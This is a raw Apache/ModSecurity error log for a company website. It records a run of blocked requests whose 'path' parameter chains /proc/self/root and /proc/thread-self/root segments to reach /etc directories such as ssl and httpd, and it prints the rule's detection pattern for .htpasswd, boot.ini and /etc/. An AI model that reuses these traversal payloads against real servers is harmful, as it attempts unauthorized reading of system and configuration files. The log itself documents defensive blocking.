[Mon Mar 16 08:25:53.819665 2026] [:error] [pid 21946:tid 140411666392832] [client 74.7.243.203:43476] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfowXbQATo66fKoS7wvUwAAAMk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:25:55.103292 2026] [:error] [pid 10831:tid 140411641214720] [client 74.7.243.203:43492] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfow46lpbStxTqkSktSAgAAAkw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:25:58.446569 2026] [:error] [pid 32654:tid 140411574073088] [client 74.7.243.203:43506] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfoxglT9VtDQc7bgUyNMwAAARQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:25:59.812043 2026] [:error] [pid 21806:tid 140411624429312] [client 74.7.243.203:43514] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfox9SswJuvopo3lOhFVwAAAI4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:26:01.358386 2026] [:error] [pid 10651:tid 140411607643904] [client 74.7.243.203:39408] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfoybysWC90G-1nBrAqrgAAAZA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:26:02.660520 2026] [:error] [pid 10831:tid 140411582465792] [client 74.7.243.203:39416] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfoyo6lpbStxTqkSktSCQAAAlM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:26:03.858734 2026] [:error] [pid 21806:tid 140411607643904] [client 74.7.241.46:51926] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfoy9SswJuvopo3lOhFWQAAAJA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:26:03.952776 2026] [:error] [pid 21946:tid 140411574073088] [client 74.7.243.203:39424] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfoy3bQATo66fKoS7wvVAAAANQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:26:05.144431 2026] [:error] [pid 10709:tid 140411632822016] [client 74.7.243.203:39434] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfozRXjF1vJNtV6CWrfewAAAc0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:26:05.194543 2026] [:error] [pid 10709:tid 140411624429312] [client 74.7.241.46:34686] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfozRXjF1vJNtV6CWrffAAAAc4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:26:06.370292 2026] [:error] [pid 21533:tid 140411641214720] [client 74.7.241.46:34690] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfoznjZBu2q05ozVU86PwAAAUw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:26:07.464549 2026] [:error] [pid 11972:tid 140411683178240] [client 74.7.243.203:39436] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfoz5qj1wV0Si-OkefNwQAAAAc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:26:08.785965 2026] [:error] [pid 32654:tid 140411733534464] [client 74.7.243.203:39442] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfo0AlT9VtDQc7bgUyNOQAAAQE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:26:10.094971 2026] [:error] [pid 32654:tid 140411649607424] [client 74.7.243.203:39454] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfo0glT9VtDQc7bgUyNPQAAAQs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:26:13.322407 2026] [:error] [pid 10651:tid 140411699963648] [client 74.7.243.203:56294] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfo1bysWC90G-1nBrAquwAAAYU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:26:17.725865 2026] [:error] [pid 32654:tid 140411733534464] [client 74.7.243.203:56304] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfo2QlT9VtDQc7bgUyNSwAAAQE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:26:22.581370 2026] [:error] [pid 11972:tid 140411599251200] [client 74.7.243.203:56312] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfo3pqj1wV0Si-OkefN0wAAABE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:26:24.536321 2026] [:error] [pid 21946:tid 140411708356352] [client 74.7.243.203:52512] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfo33bQATo66fKoS7wvVwAAAMQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:26:25.899168 2026] [:error] [pid 21946:tid 140411716749056] [client 74.7.243.203:52528] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfo4XbQATo66fKoS7wvWQAAAMM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:26:27.793136 2026] [:error] [pid 32654:tid 140411548894976] [client 74.7.241.46:34692] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfo4wlT9VtDQc7bgUyNWAAAARc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:26:28.239177 2026] [:error] [pid 10772:tid 140411658000128] [client 74.7.243.203:52538] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfo5P9ocpUE4ed4uDzTNwAAAgo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:26:29.590399 2026] [:error] [pid 21805:tid 140411649607424] [client 74.7.243.203:52548] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfo5bABkC4fWIHEf8HQ9AAAAEs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:26:31.237053 2026] [:error] [pid 10831:tid 140411599251200] [client 74.7.241.46:34404] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfo546lpbStxTqkSktSDgAAAlE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:26:31.908086 2026] [:error] [pid 21533:tid 140411632822016] [client 74.7.243.203:50016] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfo53jZBu2q05ozVU86QwAAAU0"], referer: 